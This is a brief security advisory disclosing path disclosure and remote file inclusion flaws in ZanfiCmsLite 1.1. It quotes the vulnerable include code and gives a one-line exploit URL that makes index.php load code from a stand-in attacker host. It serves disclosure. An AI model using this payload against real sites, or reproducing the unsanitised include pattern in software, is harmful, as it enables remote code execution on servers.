ZanfiCmsLite is susceptible to remote file inclusion and path disclosure vulnerabilties.
02942496ed418d323512b6c454d5e76733b0144cb3c43bd3f58f17a0673b41ed
**********************************
*AuThor:Cracklove *
*emA!l:Cracklove[at]Gmail[dot]Com*
*HoMePaGe:https://ProxySky.com *
**********************************
[Info]
Website: https://www.zanfi.nl
Version: 1.1,The Newest Version
Problem: Full path disclosure,Include file
[Vuls]
1.Full path disclosure:
Let's try to request like this:
https://localhost/cms/adm_pages.php
and we get standard error messages like that:
Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in c:\appserv\www\cms\adm_pages.php on line 2
No blocks in the table
The Problem also in corr_pages.php,del_block.php,del_page.php,footer.php,home.php etc.
2.Include file
Ok let's open ./index.php,We see
if (!isset($inc)):
include ("home.php");
else:
include ($inc.".php");
endif;
O Yeah!See u Again Include Vul!
[Exploit]
https://target/index.php?inc=https://[Attacker]
[Fix]
Vuls has been reported to autuor,No reply yet.
[Greetings]
Greets To Lcx,Fatb,Envymask,S4T,ITS,CHT,WDYL,~The WhackerZ~ TeAm.
https://www.proxysky.com/vulz/show.php?id=3